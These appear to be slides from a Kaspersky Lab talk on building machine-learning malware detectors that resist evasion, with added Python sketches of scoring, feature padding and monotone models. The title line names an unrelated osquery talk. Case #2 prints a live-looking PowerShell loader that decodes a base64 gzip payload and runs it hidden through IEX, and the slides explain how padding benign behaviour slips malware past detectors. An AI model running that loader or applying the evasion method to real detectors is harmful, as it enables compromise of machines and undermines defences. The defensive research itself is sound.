BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery

Detection is not a classification: reviewing machine learning techniques for cybersecurity specifics
Alexander Chistyakov
Research-Developer, Kaspersky Lab

Presentation plan [short]
1. Construct a powerful ML-based malware detector
2. Hack it and avoid the detection
3. Construct the new one and make it invulnerable

Presentation plan [detailed]
1. ML in cybersecurity: basic pipeline overview
2. Issues in classical ML detectors
• White box and black box attacks
• Suffering from false alarms
• Real-time detection problem
• Unclear reasons for detection
3. Reviewing the basis: constructing secure ML detectors
• Making the model invulnerable
• Effective update of the model’s formula using false positives
• Effective and interpretable detection in the real-time mode
And also: discoveries, demonstrations and a bit of math ...

Basic detection pipeline with machine learning
In-lab training stage:
1. Collect training data
2. Extract features from samples
3. Provide labels to samples
4. Select classifier’s architecture
5. Train selected model
6. Set up detection thresholds
In-product testing stage:
1. Take new item (test data)
2. Predict test item’s label
3. Labeled as malware?
• YES: malicious file, raise an alarm
• NO: benign file, check next file
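The threshold step of the pipeline can be sketched in Python. This is a minimal illustration, assuming the threshold is chosen so that at most a target share of known-benign validation files is flagged. The function names, the scores, and the 10% target are illustrative assumptions, not values from the talk.

```python
def pick_threshold(benign_scores, max_false_positive_rate):
    """Pick a cutoff from the observed benign scores so that the share of
    benign scores strictly above it stays within the target (ties aside).
    A sample is flagged when its score is strictly greater than the cutoff."""
    if not benign_scores:
        raise ValueError("need at least one benign validation score")
    ordered = sorted(benign_scores)
    n = len(ordered)
    allowed = int(max_false_positive_rate * n)  # benign samples we may flag
    # At most `allowed` scores lie above ordered[n - allowed - 1].
    return ordered[n - allowed - 1]


def is_malicious(score, threshold):
    return score > threshold


# Hypothetical model outputs on known-benign validation files.
benign = [0.02, 0.05, 0.10, 0.11, 0.20, 0.25, 0.30, 0.41, 0.55, 0.93]
threshold = pick_threshold(benign, max_false_positive_rate=0.10)
flagged = sum(is_malicious(s, threshold) for s in benign)
print(threshold, flagged)
```

A lower target rate pushes the cutoff up, which trades missed detections for fewer false alarms.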

Vulnerabilities in classical machine learning

Malicious behavior detection
Pros:
1. Fileless threats processing
2. Hard to obfuscate
3. Detection of attacks based on benign software
Cons:
1. High risk to the system when analyzing a malicious sample
2. Risk of missing hidden channels
3. Possible performance degradation
Why "machine learning"?
1. Thousands of samples per day
2. Hundreds / thousands of events per sample
3. Complex dependencies matter
Example event log:
ProcessStart(0)
LoadLibrary("c:\windows\system32\0c990d93e8c77d7549b1cf3d2.exe")
LoadLibrary("c:\windows\system32\ntdll.dll")
LoadLibrary("c:\windows\system32\kernel32.dll")
LoadLibrary("c:\windows\system32\kernelbase.dll")
LoadLibrary("c:\windows\system32\winmm.dll")
CreateThreadLocal(3471)
LoadLibrary("c:\windows\system32\shell32.dll")
LoadLibrary("c:\windows\system32\shlwapi.dll")
LoadLibrary("c:\windows\system32\wshtcpip.dll")
LoadLibrary("c:\windows\system32\wshqos.dll")
RegCreateKey("hklm\system\controlset001\services\tcpip\parameters")
RegCreateKey("hklm\software\microsoft\systemcertificates\trust")
RegCreateKey("hkcu\software\microsoft\systemcertificates\ca")
LoadLibrary("c:\windows\system32\iphlpapi.dll")
LoadLibrary("c:\windows\system32\crypt32.dll")
CreateThreadLocal(2920)
RegCreateKey("hkcu\software\microsoft\systemcertificates\my")
ModifyFile("c:\program files\7-zip\7zcon.sfx")
RenameFile("c:\program files\7-zip\7zcon.sfx", "c:\program files\7-zip\7zcon.sfx.xoxoxo")
CreateFile("c:\program files\7-zip\history.txt",[48495344F59206F66])
ModifyFile("c:\program files\7-zip\history.txt")
ModifyFile("c:\python26\lib\idlelib\credits.txt.xoxoxo")
RenameFile("c:\python26\lib\idlelib\credits.txt.xoxoxo", "c:\python26\lib\idlelib\credits.txt")
FileModified("c:\program files\ida\cfg\dsp563xx.cfg.xoxoxo")
RenameFile("c:\program files\ida\cfg\dsp563xx.cfg.xoxoxo", "c:\program files\ida\cfg\dsp563xx.cfg")
...
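A log like the one above has to become a fixed-size input before a model can score it. The sketch below shows one simple option, assuming plain per-event-type counts are used as features. The helper names and the shortened sample log are illustrative, and the talk does not say that this exact encoding is used.

```python
import re
from collections import Counter

# The event name is everything before the first "(" on a log line.
EVENT_NAME = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)\(")


def count_events(log_lines):
    """Count how many times each event type occurs in a behavior log."""
    counts = Counter()
    for line in log_lines:
        match = EVENT_NAME.match(line)
        if match:  # skips wrapped argument lines and "..." placeholders
            counts[match.group(1)] += 1
    return counts


def to_feature_vector(counts, feature_order):
    """Fixed-order vector; event types that never occurred become 0."""
    return [counts.get(name, 0) for name in feature_order]


# Shortened log in the style of the excerpt (file names only, paths dropped).
sample_log = [
    'ProcessStart(0)',
    'LoadLibrary("ntdll.dll")',
    'LoadLibrary("kernel32.dll")',
    'RegCreateKey("...")',
    'ModifyFile("7zcon.sfx")',
    'RenameFile("7zcon.sfx",',
    '"7zcon.sfx.xoxoxo")',
    '...',
]
features = ["LoadLibrary", "CreateFile", "ModifyFile", "RenameFile", "RegCreateKey"]
counts = count_events(sample_log)
vector = to_feature_vector(counts, features)
print(vector)  # [2, 0, 1, 1, 1]
```

Counting discards event order and arguments, which is exactly the kind of dependency the "complex dependencies matter" point warns about, so richer encodings are usually needed in practice.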

Linear models
[Figure: linear model. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Linear transformation: 2.47. Model’s output: 0.922 (malicious file).]
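The two numbers on this slide are consistent with a weighted sum followed by a logistic (sigmoid) function, since sigmoid(2.47) is about 0.922. A minimal sketch follows. The weights are hypothetical (the slide does not list them) and were picked so that the slide's input values give about 2.47. Pairing the values with the feature names in order, and the 0.5 cutoff, are also assumptions.

```python
import math

FEATURES = ["LOAD LIBRARY", "CREATE FILE", "INJECT TO PROCESS", "MODIFY SERVICE",
            "CREATE SERVICE", "MODIFY REGISTRY", "BIAS CONSTANT"]

# Hypothetical weights, one per feature; the last one multiplies the constant 1.
WEIGHTS = [0.05, -0.03, 1.5, 0.8, 1.2, 0.4, -0.64]


def linear_score(values, weights):
    """Weighted sum of the input features (the "linear transformation")."""
    return sum(v * w for v, w in zip(values, weights))


def sigmoid(z):
    """Squash a real-valued score into the (0, 1) range."""
    return 1.0 / (1.0 + math.exp(-z))


values = [10, 3, 1, 0, 1, 0, 1]           # input values shown on the slide
score = linear_score(values, WEIGHTS)      # about 2.47 with these weights
probability = sigmoid(score)               # about 0.922
verdict = "Malicious file" if probability > 0.5 else "Benign file"
print(round(score, 2), round(probability, 3), verdict)
```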

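Linear models
• Easy to implement
• Easy to train
• Easy to understand
[Figure: linear model. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Linear transformation: 2.47. Model’s output: 0.922 (malicious file).]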

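Linear models
• Easy to implement
• Easy to train
• Easy to understand
• Easy to hack
[Figure: the linear model under attack. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 1, 0, 1, 0, 1, with one input value changed to 200. Linear transformation: -3.62. Model’s output: 0.027 (benign file).]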
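The "easy to hack" point can be illustrated with a white-box sketch: if any feature has a negative weight, an attacker who knows the weights can add harmless behavior of that type until the score falls below the cutoff. The weights below are hypothetical, and so is the assumption that CREATE FILE carries the negative weight; the resulting scores only roughly resemble the slide's.

```python
import math

FEATURES = ["LOAD LIBRARY", "CREATE FILE", "INJECT TO PROCESS", "MODIFY SERVICE",
            "CREATE SERVICE", "MODIFY REGISTRY", "BIAS CONSTANT"]
# Hypothetical weights (not from the talk). CREATE FILE is slightly negative,
# as if the model had learned that benign programs create many files.
WEIGHTS = [0.05, -0.03, 1.5, 0.8, 1.2, 0.4, -0.64]


def probability(values):
    """Sigmoid of the weighted sum of the input features."""
    z = sum(v * w for v, w in zip(values, WEIGHTS))
    return 1.0 / (1.0 + math.exp(-z))


def pad_to_evade(values, cutoff=0.5, max_extra=1000):
    """Increase the most negatively weighted (non-bias) feature step by step
    until the sample is scored as benign. Returns None if that is impossible."""
    idx = min(range(len(WEIGHTS) - 1), key=lambda i: WEIGHTS[i])
    if WEIGHTS[idx] >= 0:
        return None  # no negative weight to exploit
    padded = list(values)
    for _ in range(max_extra):
        if probability(padded) <= cutoff:
            return padded
        padded[idx] += 1  # e.g. create one more harmless file
    return None


malware = [10, 3, 1, 0, 1, 0, 1]
evaded = pad_to_evade(malware)
print(FEATURES[1], evaded[1], round(probability(evaded), 3))

slide_like = [10, 200, 1, 0, 1, 0, 1]  # one value raised to 200, as on the slide
print(round(probability(slide_like), 3))
```

The malicious actions are untouched; only extra benign-looking activity is added, which is why such padding is cheap for an attacker.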

Neural network
[Figure: neural network with one hidden layer. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Hidden layer after the first linear transformation: 3.29, -4.3, 0.13, plus a constant 1. Second linear transformation: 2.54. Model’s output: 0.927 (malicious file).]

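Neural networks
• Lots of open libraries
• Nonlinear multilayer architectures
• Good performance and detection quality
[Figure: neural network with one hidden layer. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Hidden layer: 3.29, -4.3, 0.13, plus a constant 1. Second linear transformation: 2.54. Model’s output: 0.927 (malicious file).]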

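Neural networks
• Lots of open libraries
• Nonlinear multilayer architectures
• Good performance and detection quality
• Still hackable
[Figure: the neural network under attack. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 1, 0, 1, 1, with changed input values 12 and 17. Hidden layer: 1.17, -2.3, 0.61, plus a constant 1. Second linear transformation: -2.47. Model’s output: 0.078 (benign file).]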

Advanced black-box attacks setup
No access to model’s weights…
… or architecture …
… or output scores
Just train your own model on the victim’s detections, then attack that model to find samples that bypass the target detector

Behavior neural network detection quality

Dynamic classification issue [DEMO: Trojan.Win32.BitMiner]

Dynamic classification issue [DEMO: Google Chrome]
FALSE ALARM

False alarms issue
False alarm
Malware detection is an undecidable problem.
Therefore, we will always have some mistakes.

False alarms issue
1. Create a white list:
+ fast
- need to choose radius
- loss of detections
- complex surface
- unlimited growth of memory
2. Retrain the model:
+ same memory usage
- time-consuming

Key issues of machine learning:
1. Models are unstable
2. Hard to fix errors
3. Hard to interpret
4. Models are vulnerable

Constructing secure machine learning detectors

No malicious code can become clean after the injection of any new functionality

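Secure linear models
• Monotonic features
• Nonnegative weights
[Figure: linear model. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Linear transformation: 2.47. Model’s output: 0.922 (malicious file).]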

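Secure linear models
• Monotonic features
[Figure: the secure linear model under attack. Input feature labels shown: CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 0, 0, 1, 0, 1, with one input value changed to 200. Linear transformation: 2.68. Model’s output: 0.935 (malicious file).]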
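Why padding stops working here can be shown with a short sketch: when every feature can only grow as more behavior is added and every feature weight is non-negative, extra behavior can never lower the score. The weights are hypothetical. Clipping negative weights to zero after each training step is one common way to enforce the constraint and is an assumption here, not a method confirmed by the talk.

```python
FEATURES = ["LOAD LIBRARY", "CREATE FILE", "INJECT TO PROCESS",
            "MODIFY SERVICE", "CREATE SERVICE", "MODIFY REGISTRY"]
WEIGHTS = [0.02, 0.001, 1.5, 0.8, 1.2, 0.4]   # hypothetical, all >= 0
BIAS = -0.433                                  # the bias itself may be negative


def project_nonnegative(weights):
    """Clip negative weights to zero (assumed to run after each training update)."""
    return [max(0.0, w) for w in weights]


def score(values, weights=WEIGHTS, bias=BIAS):
    """Linear score that refuses to run with a non-monotone weight vector."""
    if any(w < 0 for w in weights):
        raise ValueError("non-negative weights required for monotonicity")
    return bias + sum(v * w for v, w in zip(values, weights))


malware = [10, 3, 1, 0, 1, 0]
padded = [10, 200, 1, 0, 1, 0]   # same sample plus many extra file creations

print(round(score(malware), 3), round(score(padded), 3))

# Raising any single feature never lowers the score.
for i in range(len(FEATURES)):
    bumped = list(malware)
    bumped[i] += 50
    assert score(bumped) >= score(malware)
```

The cost is expressiveness: the model can no longer use "this behavior looks benign" as evidence, only "this behavior looks suspicious".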

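Secure neural networks
• Monotonic activation functions
• Monotonic features
[Figure: neural network with one hidden layer. Input feature labels shown: CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Hidden layer: 0.29, 1.34, 0.13, plus a constant 1. Second linear transformation: 2.47. Model’s output: 0.922 (malicious file).]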

• Monotonic activation functions
• Monotonic features
• Nonnegative weights
• Min-max pooling output layer
• K-layers architecture for K-dimensional data
[Figure: monotone neural network. Input features: LOAD LIBRARY, CREATE FILE, INJECT TO PROCESS, MODIFY SERVICE, CREATE SERVICE, MODIFY REGISTRY, BIAS CONSTANT; values shown: 10, 3, 1, 0, 1, 0, 1. Hidden values in three groups: (5.02, 3.29, 2.47), (0.17, 1.26, 7.31), (-1.2, 0.19, 7.66); group minima: 2.47, 0.17, -1.2; their maximum: 2.47. Model’s output: 0.922 (malicious file).]
Daniels, Hennie, and Marina Velikova. "Monotone and partially monotone neural networks." IEEE Transactions on Neural Networks 21.6 (2010): 906-917.
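The hidden values on this slide are consistent with taking the minimum inside each group of hidden units and then the maximum across groups, which gives 2.47. The sketch below implements that min-max pooling on top of linear units with non-negative weights. The grouping is inferred from the slide's numbers, and the small network at the end uses hypothetical weights; it is not the network from the talk or a full implementation of the cited paper.

```python
def pool(hidden_groups):
    """Min within each group, then max across groups."""
    return max(min(group) for group in hidden_groups)


def monotone_minmax(values, groups):
    """groups: list of groups, each a list of (weights, bias) linear units.
    With non-negative weights every unit is non-decreasing in every input,
    and min/max preserve that, so the output is monotone as well."""
    hidden_groups = []
    for group in groups:
        outputs = []
        for weights, bias in group:
            if any(w < 0 for w in weights):
                raise ValueError("monotonicity needs non-negative weights")
            outputs.append(bias + sum(w * v for w, v in zip(weights, values)))
        hidden_groups.append(outputs)
    return pool(hidden_groups)


# Hidden values as shown on the slide: pooling reproduces the 2.47 score.
slide_hidden = [[5.02, 3.29, 2.47], [0.17, 1.26, 7.31], [-1.2, 0.19, 7.66]]
print(pool(slide_hidden))  # 2.47

# Hypothetical two-group network over three features.
groups = [
    [([0.1, 0.5, 0.0], -1.0), ([0.0, 0.2, 1.0], 0.5)],
    [([0.3, 0.0, 0.2], -2.0), ([0.05, 0.05, 0.05], 0.0)],
]
base = [10, 3, 1]
base_out = monotone_minmax(base, groups)
for i in range(len(base)):
    bumped = list(base)
    bumped[i] += 5
    assert monotone_minmax(bumped, groups) >= base_out - 1e-12
```

Unlike a single linear unit, the max over several minima can describe non-linear decision boundaries while keeping the guarantee that added behavior never lowers the score.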

…
ModifyFile("notepad.exe")
CreateFile("config.xml",0644)
CreateFile("doc1.rtf",0755)
ModifyFile("doc1.rtf")
CreateFile("list.rtf",0755)
ModifyFile("list.rtf")
ModifyFile("config.xml")
DeleteFile("doc1.rtf")
DeleteFile("list.rtf")
…
[Figure: the log is turned into a graph that links event types (Create File, Modify File, Delete File) to their arguments (notepad.exe, config.xml, doc1.rtf, list.rtf, 0644, 0755). Resulting input features: CREATE FILE, MODIFY FILE, DELETE FILE, DNS REQUEST, BIAS CONSTANT; values shown: 4, 4, 2, 0, 1. Linear transformation: 2.47. Model’s output: 0.922 (malicious file).]

Detection with monotonic models [DEMO: Trojan.Win32.BitMiner]

Detection with monotonic models [DEMO: Google Chrome]

Secure decision trees
[Figure: plot with axes Cα (0 to 80) and Cβ (0 to 24), next to a decision tree. Root split: Cβ > 12; second-level splits: Cα > 70 and Cα > 12; leaves: malicious file, benign file, benign file, malicious file.]

[Figure: plot with axes Cα (0 to 80) and Cβ (0 to 24), next to a decision tree. Root split: Cβ > 12; second-level splits: Cα > 70 and Cα > 20; leaves: malicious file, benign file, benign file, malicious file.]

[Figure: plot with axes Cα (0 to 80) and Cβ (0 to 24), next to a decision tree. Root split: Cα > 40; second-level splits: Cβ > 6 and Cβ > 12; leaves: suspicious file (25%), suspicious file (50%), malicious file, benign file.]
NOT MONOTONIC
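Whether a tree is monotonic can be tested by brute force on a grid: look for two points where one has at least as much of every feature as the other yet gets a lower score. The sketch below uses one possible reading of the tree on this slide. Which leaf hangs under which branch is an assumption, because the extracted slide text does not preserve it, and the "repaired" variant is hypothetical and is not the tree from the talk.

```python
from itertools import product


def tree_score(c_alpha, c_beta):
    """Assumed reading of the slide's tree, with leaves mapped to scores."""
    if c_alpha > 40:
        return 1.0 if c_beta > 12 else 0.25   # malicious / suspicious (25%)
    return 0.5 if c_beta > 6 else 0.0         # suspicious (50%) / benign


def repaired_score(c_alpha, c_beta):
    """Hypothetical variant whose leaf scores never decrease."""
    if c_alpha > 40:
        return 1.0 if c_beta > 12 else 0.5
    return 0.5 if c_beta > 6 else 0.0


def find_violation(score, alpha_values, beta_values):
    """Return (lower_point, higher_point) where the higher point scores
    lower than the point it dominates, or None if the grid shows no violation."""
    points = list(product(alpha_values, beta_values))
    for (a1, b1), (a2, b2) in product(points, points):
        if a1 <= a2 and b1 <= b2 and score(a1, b1) > score(a2, b2):
            return (a1, b1), (a2, b2)
    return None


alphas = range(0, 81, 10)
betas = range(0, 25, 3)
violation = find_violation(tree_score, alphas, betas)
print(violation)
print(find_violation(repaired_score, alphas, betas))
```

Under this reading, raising Cα past 40 while Cβ stays between 6 and 12 drops the verdict from 50% to 25% suspicious, so adding behavior makes the sample look cleaner.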

[Figure: plot with axes Cα (0 to 80) and Cβ (0 to 24), next to a deeper decision tree. Splits: Cα > 40, Cβ > 6, Cβ > 12, Cβ > 12, Cβ > 6; leaves: malicious file, benign file, suspicious file (60%), suspicious file (33%), benign file, benign file.]
Potharst, Rob, and Adrianus Johannes Feelders. "Classification trees for problems with monotonicity constraints." ACM SIGKDD Explorations Newsletter 4.1 (2002): 1-10.

Monotonic models toolbox
1. Artificial neural networks
• Dropout
• Batch / Weight normalization
• Min / Max / Average-pooling layers
• Autoencoders
• Recurrent networks
2. Decision trees
3. Classification ensembles
• Random forest
• AdaBoost
• Gradient boosting (including XGBoost)
4. Kernel-SVM
5. Nonparametric methods
• k-NN
• Parzen-window density estimator
6. …

Fixing false alarms in the monotonic space
1. Detect a problem with false positives
2. Identify the area of benign behavior
3. Join the benign area boundary with your model’s decision rule
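One way to read these three steps is sketched below. It assumes that the "area of benign behavior" for a confirmed false positive is every sample showing no more of any behavior than that false positive, and that "joining" means treating this area as benign before the model is consulted. The class, the toy scoring function, and the numbers are illustrative assumptions.

```python
def dominated_by(x, y):
    """True when x <= y in every coordinate (x shows no more of any behavior)."""
    return all(a <= b for a, b in zip(x, y))


class PatchedDetector:
    def __init__(self, base_score, threshold):
        self.base_score = base_score   # assumed monotone in every feature
        self.threshold = threshold
        self.benign_corners = []       # confirmed false positives

    def add_false_positive(self, features):
        """Step 2: the false positive becomes the corner of a benign area."""
        self.benign_corners.append(tuple(features))

    def is_malicious(self, features):
        """Step 3: the benign area overrides the model inside its boundary."""
        if any(dominated_by(features, corner) for corner in self.benign_corners):
            return False
        return self.base_score(features) > self.threshold


# Toy monotone model over two count features (hypothetical weights).
detector = PatchedDetector(lambda x: 0.3 * x[0] + 0.5 * x[1], threshold=3.0)

false_alarm = (8, 2)
print(detector.is_malicious(false_alarm))   # True: step 1, the false alarm
detector.add_false_positive(false_alarm)
print(detector.is_malicious(false_alarm))   # False after the patch
print(detector.is_malicious((9, 2)))        # True: outside the benign area
```

The patched rule stays monotone: if a sample is flagged, it is not inside any benign area, so no sample with at least as much of every behavior can be inside one either, and the base score cannot be lower.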

Model's output interpretation

Case #1: Trojan.Win32.BitMiner
More than 200K users affected
Score | Event
------------------------------------------------------------------------------------------------------------
2.734 | RegCreateKey("$hklmsoftwareminergateorganizationdefaultsminersmro")
2.737 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","visible","true")
4.238 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","pool","xmr.pool.minergate.com:45560")
Score | Event
-------------------------------------------------
-2.083 | RegCreateKey("$hklmsystemcontrolset001servicesdirectx11b")
-2.083 | RegSetValue("$hklmsystemcontrolset001servicesdirectx11b","imagepath",""$appdataDirectX11bSystem.exe"")
-1.175 | InstallMd5("$appdatadirectx11bsystem.exe",0x4635935FC972C582632BF45C26BFCB0E)
Score | Event
------------------------------------------------------------
-0.077 | WriteProcessMemory("bi16.cmd",0x000000007EFDF368,0,0,8)
-0.077 | ResumeThread("bi16.cmd")
-0.077 | LoadLibrary("$windirregedit.exe")
0.733 | CreateProcess("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
0.734 | CreateProcessInt("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
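If the score column is read as the model's running output after each event, the events that matter most are the ones where the score jumps. The sketch below ranks events by that jump, using the three scores from the first table of this case. The event strings are abbreviated, and reading the column as a running score is an assumption.

```python
def score_jumps(scored_events):
    """scored_events: list of (running_score, event) pairs in log order.
    Returns (increase, event) pairs, largest increase first. The first
    event has no predecessor and is therefore skipped."""
    jumps = []
    previous = None
    for score, event in scored_events:
        if previous is not None:
            jumps.append((round(score - previous, 3), event))
        previous = score
    return sorted(jumps, key=lambda pair: pair[0], reverse=True)


trace = [
    (2.734, 'RegCreateKey(...)'),
    (2.737, 'RegSetValue(..., "visible", "true")'),
    (4.238, 'RegSetValue(..., "pool", "xmr.pool.minergate.com:45560")'),
]
ranked = score_jumps(trace)
for increase, event in ranked:
    print(increase, event)
```

Here the write of the mining pool address accounts for almost the entire increase, which is the kind of human-readable reason an analyst can check.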

Case #2: Shellcode execution via powershell
CreateProcess("$system32windowspowershellv1.0powershell.exe",
""powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream( ,
[Convert]::FromBase64String(
'H4sIAKAhylkCA71W62/aSBD/nEr9H6wKCaOjYCdA00iVzk9wwjMG8zpUGXuxN6wf8SOY9Pq/
3yzYCb0mVa4fzkJiHzM7v/nNzM5uUt9KcOAzyB1EnsaP2jbz7f27s6EZmR7Dlrb2NKgypcxoV
s7OYL20vwvnm9kFavck5gvDLoUwlAPPxP7q6kpKowj5yXFea6NEiGPkrQlGMVth/mamLorQx8
H6DlkJ840pfa21SbA2SS62l0zLRcxHwbfpXjewTAqtpocEJ2z5r7/KleVHflVT7lOTxGxZ38c
J8mo2IeUK871CDY73IWLLPWxFQRxsktoU+xfntYkfmxvUh9MeUA8lbmDH5Qo4A78IJWnkM6du
0XOOUmwZhsMosATbjlAMSjXNfwi2iC35KSFV5k92mYO4Tf0Eewj2ExQFoY6iB2yhuNYxfZugW
7RZsX20K3x/qxJ7qgRSwySqVCEqr6PtBXZK0PGAcuVnvIeAVuDLgwo0fH//7v27TZEHJMuC9R
oHPe/xNBFgdLY8jBFgZYdBjA/iXxiuyvTAnJkE0R6mpXGUosqKWdJQLFcroLbVHHHiY/X1I/h
CHqTvv87mjqbA6tIIsL0CrTxUJTs17udfW3Tr9ayT0Qb7SN77poetIrHYl8hHG4IOPtcKsT5A
Y8v5BrJlRJBjJpTHKrP8WU3xcPKkK6aY2CgSLAhgDKggtpUfwRxDw5Y1v4c8IOs4L0MgNpDOq
JDOU3hfWKdzECpLxIzjKjNMoZ6sKqMjkyC7ygh+jPMtIU2Cw7D8DLeXkgRbZpwUx60qJ1TmJq
XAj5MotSCE4P5YD5GFTULZqDIdbCNxr2OnMF1+kQvJJAT7Dpz0ALGAFcqBntDEiABlkQSVmo4
SzQsJ8kDsUN4qMR0o5rwWDslkOsguv4CzyPNjUlNSCjZOUEKkdRIkVcbAUQIXBSU4T6rfxnFy
URSIpAjlwWGLGlqK+4SmfCmzxpe7YKDo8qVAszWn60BOlAAxahR4ohmjVkNPIqCN/VBXsNwcy
sGjAJ+i3o4MUZ8YC61nXxNdS/S5grsT19Uwrzkw308UZ5hw4c143LnW5Y4QyZm7EbRYUzrifs
SLgtXBn4xrcTIBPSx1R3eZJtii58ycubTThu5MA0NS19Ec+Bc11xK5BeeInCp1ddFVMCc4+qg
zavALrX5JRPyoa7rQmT7Ze7KjNBqdWTYW+r1rwVUHtsqfqwf9LdVfbNtdWTnMLTofzWMFK2BH
Uecjw0VTIxSniroYGaHm/LFzRka33lBdEdY1nHVDvQ4fzwMPyVhfNy/MaTNcewYHHE11zXd1a
yONO5Yn1uvGhO9rGKnj6ZbLdgqX7Y0+6AQtw/d8SqswrBst8TDKBvIk7d0Ju+6dkvVxI+vfbY
XpFl/vJn5n141BSuz3LDKenAfyhPNaRsPbZJQqQa7zyJnQUff8liw8lV93Rul81t8h6XO7xxG
vD3xii+JQ55SvCYcbgnzjuAfT4ghwXmeX3cjQG5/qnw2QXdxL5LOGN+p9hw91UxMgDcRrjMR7
EbjR1yF/G7bahQ/gdzbhQ8CXY+QAM+ba7c5DnZ/PBFvva9llW1N2ggC6yqU8c550h/WhLXSji
Pr5IPEBWdd5o78wt6Kpz/3bHdJGwCmYp3notaY3t+PmKPd7gsdHjm2KVcN2CH4IAs0k0G0C11
B5Pn7GOVQ0DfDcND28szXBGqi7zkyfqnfyB1pWUFclF12elMhrHbFnRrFrEigd6HHFVaYGkZq
3rWGAqQbLnjxjtijyEYH2Dw+E4jIQCAks2kJP2xx08WNvXcHVNoHhxfmLowrzJFh5bq3F0tXV
AiDTtnpS/bUu8p3ErXLZBcdBp+SyBgeev91dKQj37A9HVmnHpbT92xQ5mKrQm6iEB/Z0+H/wm
l+DLvzZb+T1ee0Xu2/imqseePhp9ceF/8T3b9IwNXEC8jrc5QQd3xm/ZCNPqJMH2iFikCeb/K
Pv5UGafOzDw+0fYnWge6ULAAA='
));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress
))).ReadToEnd();",0xF7722B62B4014E0C50ADFA9D60CAFA1C)

Case #4: ML detector against a zero-day threat
• In October 2017 we spotted BlackOasis activity. The attack used a Flash zero-day exploit: https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
• After the vulnerability is successfully exploited, the payload is executed
• The attack used a special technique for payload execution:
  • A special service was created
  • The main malware modules were dropped to %programdata%
  • The modules included a legitimate utility, adaptertroubleshooter.exe
  • This utility was used to load the main malware module via DLL hijacking

LET’S TALK?
Kaspersky Lab HQ
39A/3 Leningradskoe Shosse
Moscow, 125212, Russian Federation
Tel: +7 (495) 797-8700
www.kaspersky.com
